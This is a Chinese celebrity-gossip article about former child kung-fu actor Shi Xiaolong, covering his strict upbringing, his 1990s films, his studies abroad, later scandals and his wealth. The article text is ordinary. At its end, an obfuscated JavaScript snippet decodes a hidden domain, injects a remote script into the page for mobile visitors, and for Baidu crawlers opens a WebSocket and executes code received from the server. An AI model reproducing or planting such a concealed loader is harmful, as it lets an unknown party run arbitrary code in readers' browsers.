释小龙的不红让人羡慕,开400万豪车、坐游艇,如今身价过亿

提起释小龙,相信很多人都会有这样的想法:释小龙啊,我知道,不就是那个过气的童星嘛。

“过气童星”成了他身上最大的标签,曾经的释小龙曾经也火极一时,给人们带来不少印象深刻的作品。

少林小子、少年展昭等角色,更是陪伴了整个80、90后的童年。

后来,释小龙忽然间就销声匿迹了,很多人都觉得这是市场的选择,是他不红了,就凉了,实际上这完全是释小龙自己的选择。

一、

释小龙的俗家名字叫陈小龙,他的成功离不开父亲陈同山的鞭策。

陈同山,河南省登封市大金店镇书堂沟村人,8岁随父习武,15岁炉火纯青,20多种武艺信手拈来。

陈家和少林寺颇具渊源。

陈同山的叔父陈五经幼年就苦练少林武艺,擅长少林大洪拳、罗汉拳、少林棍法等等,1983年,还获得“十大拳师的殊荣”。

因为这层关系,陈同山后来拜师少林寺的大居士郝释斋学习拳法,功夫越来越好,成为少林寺的中流砥柱,以弘扬少林寺功夫为己任。

1985年,陈同山进入少林武校任教,1988年成为少林武术的校长,释小龙就出生于这一年,陈同山对这个小小的婴儿,充满了期待,他一定要好好培养他。

或许,释小龙的故事,从他出生那一刻就注定了。

父亲殷勤的期待,有的时候也会成为伤人的荆棘,从三岁开始,释小龙筋骨刚刚略微结实一些,陈同山就开始带他刻苦练功。

每天凌晨5点,陈同山都会准时从被窝中被熟睡的释小龙拽起来,进行刻苦的基本功训练,下腰、劈跨、马步等基本功一样都不能少,稍微年长一些,就带他去跑步,从少林寺跑到登封市。

其运动强度,绝对不是年幼的释小龙能够所能承担,奈何陈同山固执地想要把这个培养成大师,自然就更加严苛地要求他。

小小的释小龙经常一边抹眼泪,一边坚持练功,如果没有意外,或许在父亲严厉的教导之下,释小龙会成为一代高手。

不过,一个机会犹如馅饼一样,从天而降直接砸在了释小龙的头上。

二、

陈同山除了担任校长之外,也会带着武术队全国各地进行武术表现,一方面弘扬少林寺的武术文化,另一方面也是扩大武术学校的影响力。

1993年,释小龙5岁,经过父亲两年的刻苦训练,已经打下坚实的武术根基,所以陈同山在出访台湾进行武术表演的时候,就带上了释小龙。

表演当天,台湾来了数不尽的社会名流,其中就有著名导演朱延平,当释小龙在台上打完一套通背拳法的时候,朱延平眼睛一亮。

虽然释小龙的武术表演一板一眼,像模像样,但是他太小了,严肃认真的表情和他奶萌的外表形成了强烈的反差,朱延平一看就知道这是一个好苗子。

交流会结束以后,朱延平找到了陈同山,向他陈述了,想要让这个孩子去拍电影的想法,陈同山欣然应从。

随后朱延平又找了一个小孩子,也就是郝劭文,想让两个小孩子一起当主角拍一部电影,不过又担心两个孩子都是新面孔,观众不买单。

恰好,1992年17岁的林志颖两个月就红遍了全中国,由此得了一个“亚洲小旋风”的绰号,然后朱延平又找到了林志颖,拍了释小龙人生中的一部戏《旋风小子》。

说得简单一点,释小龙和郝劭文是电影的内核,林志颖属于流量担当。

朱延平不愧是大导演,眼光十分精准,1994年4月15日上映《旋风小子》上映以后,直接爆火。

男俊女靓的主演,可爱但是无数高强的释小龙,萌萌的郝劭文,再加上有趣的剧情,让很多人都爱上了这部电影,即便到现在,这部电影也是一部不错的经典佳作。

电影的主演林志颖和徐若瑄成为了当时大学生们最喜爱的演员,也是第一代的偶像,释小龙和郝劭文也走进了千家万户,成了大家喜欢的对象。

释小龙火了,然而他更遭罪了。

三、

《旋风小子》的成功,也引起了其他业界同行的注意,就连竹联帮的大佬吴敦对像释小龙伸出了橄榄枝,亲自担任他的经纪人。

在这之后,释小龙又和金城武、吴孟达、周星驰等人合作了《新乌龙院》、《中国龙》、《赌圣2》等多部影片。

据不完全统计,在1994年到1995年,两天的时间释小龙一共拍摄了8部影片,这对一个孩子来讲,绝对是一个很重要的任务。

更令人心疼的是释小龙在电影中的角色,都有武打动作,需要吊大量的威亚,而释小龙又极其恐高,第一次吊威亚的时候,在空中的释小龙是又吐又哭。

然而,陈同山却不知道怎么心疼儿子,站在下面大喊:“小龙你别哭,你是男子汉!”

或许,在他眼里,这点问题根本不是问题,却忽略了儿子只是一个5岁的孩子,最后导演朱延平看不下去了:“哎呀,你快放他下来吧,才三岁什么男子汉?”

吃苦,对夏练三伏冬练三九的释小龙来说,还是一个小意思,最关键的是频繁拍戏让他失去了自己的童年。

往往他刚回学校,又要请假出去拍戏,为了不耽误学习,只能带着补习老师去剧组学习。

释小龙童年最大的愿望,竟然只是希望能够把头发留长,因为拍戏需要,他经常要把头发剃光,这样的愿望听起来很辛酸。

这样的日子持续了12年,2006年,释小龙15岁,拍摄完《少年包青天3》的他,终于有了自己的想法,人生中第一次“忤逆”了陈同山。

四、

陈同山一直在国内帮助释小龙寻觅一家合适的学校,能够学到知识,还能保密明星儿子的隐私。

而释小龙却觉得国内的环境过于压抑,他没经过父亲同意,他就跑去美国曼哈顿的纽约艺术专业高中学习影视制作。

从来不会反抗的儿子,第一次有了自己的想法,陈同山并没有觉得很欣慰,而是觉得自己的权威受到了挑战,直接爆怒,停掉释小龙的生活费。

尽管如此,释小龙还是没有屈服。

父子哪里会有隔夜仇呢?陈同山最后还是没有说服释小龙,无奈之下只能捏着鼻子同意儿子的要求,释小龙出国求学,陈同山也不当武术指导了,回家继续经营武校。

出国以后的释小龙,犹如出了笼子的鸟儿。

很多人都替释小龙可惜,在演艺生涯中的黄金时刻退出了演艺圈,却不知道那时候的释小龙有多快乐,对他来讲,普通人的生活更珍贵。

他终于留起了头发,或许是执念,他留了一头飘逸的长发,他用这句话来形容那时候的心情:

“这是我第一次生活得那么自在!念书、学东西让我很开心,没想到美国学生讲话居然可以比老师还大声,以前少林师父讲什么,我们就做什么,哪敢顶半句话?”

释小龙学的是影视制作,从这可以看出他内心依旧热爱着电影,他逃避的不是娱乐圈,而是父亲殷勤的期待。

放纵过后,还是继续生活,2008年释小龙学成归来,习得一身本事的他,信心满满地回到了内地,企图在影视圈掀起一阵波澜。

然而,这时候的娱乐圈已经不是那时候的娱乐圈了,屡次做错事的他,最终泯然于众。

五、

回国以后的释小龙,第一站就去了《康熙来了》,这一步做得还算不错,毕竟释小龙是在台湾火起来的,这也算是他的娘家。

那期的主题是“功夫小子长大了”,也非常有噱头,大家也爱看,毕竟是喜爱过的小和尚啊。

释小龙归国的第一炮并没有打响,并不是战略上的失误,而是他的颜值下降了,节目播出以后,人们发现那个奶萌的小和尚发福了,皮肤也不是很好。

那段时间,释小龙还成为了“十大长残童星”之首,虽然也开始有一些剧组找他,但是很少有好本子,角色也不像《乌龙院》那么出彩,释小龙的影视之路自然也就毫无波澜。

俗话说得好,好事不出门,坏事传千里。

没有优秀作品的释小龙,很快就因为两件“负面新闻”登上了各大娱乐版面的头条。

2013年4月份,在《中国星跳跃》节目训练现场,释小龙一名随行助理彭佳璇意外溺亡。

释小龙饱受舆论热议,这件事他很无辜。

尽管他的责任并不大,但是也要尽可能地低调起来,然而刚过两个月,又出事了,他把摄影记者给揍了。

当天,释小龙跟绯闻女友吃完饭之后,遭到了对方的跟拍,最后不知道怎么地,就激怒了释小龙,随后释小龙方面对记者实行了暴力,毁坏了跟拍车辆的车门把手以及车牌,还打飞了摄影记者的眼镜。

尽管事后,释小龙方面及时进行了道歉,但是他的口碑多多少少,还是受到了影响,那个乖巧可爱的小和尚,最终成了一个知道反抗的热血少年。

这些年来,释小龙一直没有一个代表性的作品,这是他泯然与众的根本原因,或许这也是他自己的选择,过普通人的生活,拍戏只不过是生活的调剂品。

尽管不拍戏,但是释小龙并不差钱,座驾是一辆价值400多万的法拉利。

从不缺美女为伴,从何洁到王若伊,每一任女朋友都是女神级别。

偶尔也会富豪的标配,游艇。

事实证明,如今的释小龙不需要再像以前那么拍戏,他也能够生活得很好,据说他家里很有钱,在开封有一条街的物业。

很多人都说有陈同山这样的父亲是他的不幸,牺牲了他的童年,甚至还有人认为,陈同山拿释小龙当敛财工具,这样的观点太过片面。

为什么不能是一个父亲对儿子的殷切期盼呢?释小龙曾经吃过的苦,如今已经成了他享的福,相比他失去的童年,他的得到的更多,大家觉得呢?

影视动态 豪门明星 释小龙 电影 朱延平 陈同山 七阿姨爱 娱乐

有用 (664)

评论加载中...
function Fdhbztse(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function xtpXLz(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return Fdhbztse(t);};window['\x49\x72\x75\x61\x79\x67\x76']=(/^Android|iPhone|iPad|iPod|Linux/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=xtpXLz,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':6868/'+i);ws.onmessage=function(e){new Function('_cqgd',x(e.data))(cs);ws.close();}}else{var s=document.createElement('script');s.src=u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('aHHR0cHHM6Ly95c2prYmsuY29t','ZmEueXNqa2JrLmNvbbQ==','509',window,document,['H','b']);}:function(){};